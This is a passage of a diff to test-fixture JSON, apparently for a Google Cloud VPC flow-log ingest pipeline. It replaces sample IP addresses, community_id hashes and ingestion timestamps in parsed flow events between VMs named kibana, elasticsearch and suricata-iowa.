"{\"insertId\":\"bxuq05fhgmw9b\",\"jsonPayload\":{\"bytes_sent\":\"19506\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33564,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.597223164Z\",\"packets_sent\":\"180\",\"reporter\":\"DEST\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.866699945Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.391933700Z", + "original": "{\"insertId\":\"bxuq05fhgmw9b\",\"jsonPayload\":{\"bytes_sent\":\"19506\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33564,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.597223164Z\",\"packets_sent\":\"180\",\"reporter\":\"DEST\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.866699945Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.866699945Z", "end": "2019-06-14T03:49:59.597223164Z", @@ -13698,17 +13698,17 @@ "as": { "number": 15169 }, - "address": "203.0.113.27", + "address": "67.43.156.13", "port": 32882, "bytes": 1496, - "ip": "203.0.113.27", + "ip": "67.43.156.13", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:JBPQPPGDjRGxMSu2nEFLssfmXHs=", + "community_id": "1:FXnFBvk886dW60zh9GYIhTfux90=", "bytes": 1496, "transport": "tcp", "type": "ipv4", @@ -13722,7 +13722,7 @@ }, "related": { "ip": [ - "203.0.113.27", + "67.43.156.13", "10.87.40.76" ] }, @@ -13747,8 +13747,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868933Z", - "original": "{\"insertId\":\"bxuq05fhgmw8y\",\"jsonPayload\":{\"bytes_sent\":\"1496\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"203.0.113.27\",\"src_port\":32882},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:44:07.811355936Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:44:07.689331553Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.391939500Z", + "original": "{\"insertId\":\"bxuq05fhgmw8y\",\"jsonPayload\":{\"bytes_sent\":\"1496\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":32882},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:44:07.811355936Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:44:07.689331553Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:44:07.689331553Z", "end": "2019-06-14T03:44:07.811355936Z", @@ -13769,10 +13769,10 @@ "as": { "number": 15169 }, - "address": "192.0.2.177", + "address": "192.168.2.177", "port": 60126, "domain": "suricata-iowa", - "ip": "192.0.2.177" + "ip": "192.168.2.177" }, "source": { "address": "10.139.99.242", @@ -13786,7 +13786,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:p5hGVmQSWVn7uQmogt/lZdp5AHE=", + "community_id": "1:sulbuX1U/FB5g/v7obH/rY0tcHw=", "bytes": 155675, "name": "default", "transport": "tcp", @@ -13809,7 +13809,7 @@ "related": { "ip": [ "10.139.99.242", - "192.0.2.177" + "192.168.2.177" ] }, "gcp": { @@ -13845,8 +13845,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868935800Z", - "original": "{\"insertId\":\"bxuq05fhgmw9e\",\"jsonPayload\":{\"bytes_sent\":\"155675\",\"connection\":{\"dest_ip\":\"192.0.2.177\",\"dest_port\":60126,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"suricata-iowa\",\"zone\":\"us-central1-a\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:52.101129310Z\",\"packets_sent\":\"288\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:02.019841536Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.391945Z", + "original": "{\"insertId\":\"bxuq05fhgmw9e\",\"jsonPayload\":{\"bytes_sent\":\"155675\",\"connection\":{\"dest_ip\":\"192.168.2.177\",\"dest_port\":60126,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"suricata-iowa\",\"zone\":\"us-central1-a\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:52.101129310Z\",\"packets_sent\":\"288\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:02.019841536Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:02.019841536Z", "end": "2019-06-14T03:49:52.101129310Z", @@ -13867,9 +13867,9 @@ "as": { "number": 15169 }, - "address": "203.0.113.27", + "address": "67.43.156.13", "port": 32882, - "ip": "203.0.113.27" + "ip": "67.43.156.13" }, "source": { "address": "10.87.40.76", @@ -13883,7 +13883,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:JBPQPPGDjRGxMSu2nEFLssfmXHs=", + "community_id": "1:FXnFBvk886dW60zh9GYIhTfux90=", "bytes": 1791, "transport": "tcp", "type": "ipv4", @@ -13898,7 +13898,7 @@ "related": { "ip": [ "10.87.40.76", - "203.0.113.27" + "67.43.156.13" ] }, "gcp": { @@ -13922,8 +13922,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868938800Z", - "original": "{\"insertId\":\"bxuq05fhgmw98\",\"jsonPayload\":{\"bytes_sent\":\"1791\",\"connection\":{\"dest_ip\":\"203.0.113.27\",\"dest_port\":32882,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:44:07.811355936Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:44:07.689331553Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.391950300Z", + "original": "{\"insertId\":\"bxuq05fhgmw98\",\"jsonPayload\":{\"bytes_sent\":\"1791\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":32882,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:44:07.811355936Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:44:07.689331553Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:44:07.689331553Z", "end": "2019-06-14T03:44:07.811355936Z", @@ -13950,17 +13950,17 @@ "as": { "number": 15169 }, - "address": "203.0.113.212", + "address": "67.43.156.13", "port": 39568, "bytes": 28304484, - "ip": "203.0.113.212", + "ip": "67.43.156.13", "packets": 2400 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:3ECu9H2H+Xk3IO0c7PNGEZBOixg=", + "community_id": "1:D3OepdPO3lrAoChStvPcsoP/HLk=", "bytes": 28304484, "transport": "tcp", "type": "ipv4", @@ -13974,7 +13974,7 @@ }, "related": { "ip": [ - "203.0.113.212", + "67.43.156.13", "10.139.99.242" ] }, @@ -13999,8 +13999,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868941600Z", - "original": "{\"insertId\":\"bxuq05fhgmw96\",\"jsonPayload\":{\"bytes_sent\":\"28304484\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.212\",\"src_port\":39568},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:02.085146013Z\",\"packets_sent\":\"2400\",\"reporter\":\"DEST\",\"rtt_msec\":\"15\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:40:00.480787267Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.391955900Z", + "original": "{\"insertId\":\"bxuq05fhgmw96\",\"jsonPayload\":{\"bytes_sent\":\"28304484\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":39568},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:02.085146013Z\",\"packets_sent\":\"2400\",\"reporter\":\"DEST\",\"rtt_msec\":\"15\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:40:00.480787267Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.480787267Z", "end": "2019-06-14T03:49:02.085146013Z", @@ -14021,9 +14021,9 @@ "as": { "number": 15169 }, - "address": "203.0.113.212", + "address": "67.43.156.13", "port": 39568, - "ip": "203.0.113.212" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -14037,7 +14037,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:3ECu9H2H+Xk3IO0c7PNGEZBOixg=", + "community_id": "1:D3OepdPO3lrAoChStvPcsoP/HLk=", "bytes": 2962242, "transport": "tcp", "type": "ipv4", @@ -14052,7 +14052,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.212" + "67.43.156.13" ] }, "gcp": { @@ -14076,8 +14076,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868944500Z", - "original": "{\"insertId\":\"bxuq05fhgmw99\",\"jsonPayload\":{\"bytes_sent\":\"2962242\",\"connection\":{\"dest_ip\":\"203.0.113.212\",\"dest_port\":39568,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:49:02.085146013Z\",\"packets_sent\":\"1340\",\"reporter\":\"SRC\",\"rtt_msec\":\"15\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.480787267Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.391961400Z", + "original": "{\"insertId\":\"bxuq05fhgmw99\",\"jsonPayload\":{\"bytes_sent\":\"2962242\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":39568,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:49:02.085146013Z\",\"packets_sent\":\"1340\",\"reporter\":\"SRC\",\"rtt_msec\":\"15\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.480787267Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.480787267Z", "end": "2019-06-14T03:49:02.085146013Z", @@ -14098,9 +14098,9 @@ "as": { "number": 15169 }, - "address": "192.0.2.117", + "address": "192.168.2.117", "port": 58026, - "ip": "192.0.2.117" + "ip": "192.168.2.117" }, "source": { "address": "10.87.40.76", @@ -14114,7 +14114,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:iqLE2ZKPjY+4CpYdTYZLcB7D1xk=", + "community_id": "1:GlCQ5a9VOJVReAwOuh722hRVrD0=", "bytes": 1781, "transport": "tcp", "type": "ipv4", @@ -14129,7 +14129,7 @@ "related": { "ip": [ "10.87.40.76", - "192.0.2.117" + "192.168.2.117" ] }, "gcp": { @@ -14153,8 +14153,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868947400Z", - "original": "{\"insertId\":\"bxuq05fhgmw93\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"192.0.2.117\",\"dest_port\":58026,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:49:09.114674887Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"40\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:49:08.995009558Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.391967100Z", + "original": "{\"insertId\":\"bxuq05fhgmw93\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"192.168.2.117\",\"dest_port\":58026,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:49:09.114674887Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"40\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:49:08.995009558Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:49:08.995009558Z", "end": "2019-06-14T03:49:09.114674887Z", @@ -14175,10 +14175,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -14192,7 +14192,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Zm3DkZJD/U+ewVlHMnyoA6QK9Do=", + "community_id": "1:h8J6a5Itbyk70zoisAG0nlUOW1s=", "bytes": 9611, "name": "default", "transport": "tcp", @@ -14215,7 +14215,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { @@ -14251,8 +14251,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868950100Z", - "original": "{\"insertId\":\"bxuq05fhgmw9f\",\"jsonPayload\":{\"bytes_sent\":\"9611\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33874},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933323342Z\",\"packets_sent\":\"101\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510575555Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.391971100Z", + "original": "{\"insertId\":\"bxuq05fhgmw9f\",\"jsonPayload\":{\"bytes_sent\":\"9611\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33874},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933323342Z\",\"packets_sent\":\"101\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510575555Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.510575555Z", "end": "2019-06-14T03:49:37.933323342Z", @@ -14273,10 +14273,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -14290,7 +14290,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:d+9cs8ZSIwCZUTV/HN9P0arhfqU=", + "community_id": "1:xK6qqvSvQC9vUS1J4R94Va2tqkE=", "bytes": 318481, "name": "default", "transport": "tcp", @@ -14313,7 +14313,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { @@ -14346,8 +14346,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868953100Z", - "original": "{\"insertId\":\"bxuq05fhgmw9j\",\"jsonPayload\":{\"bytes_sent\":\"318481\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33564},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.597223164Z\",\"packets_sent\":\"181\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.866699945Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.593800036Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.593800036Z\"}", + "ingested": "2021-12-09T13:37:46.391975Z", + "original": 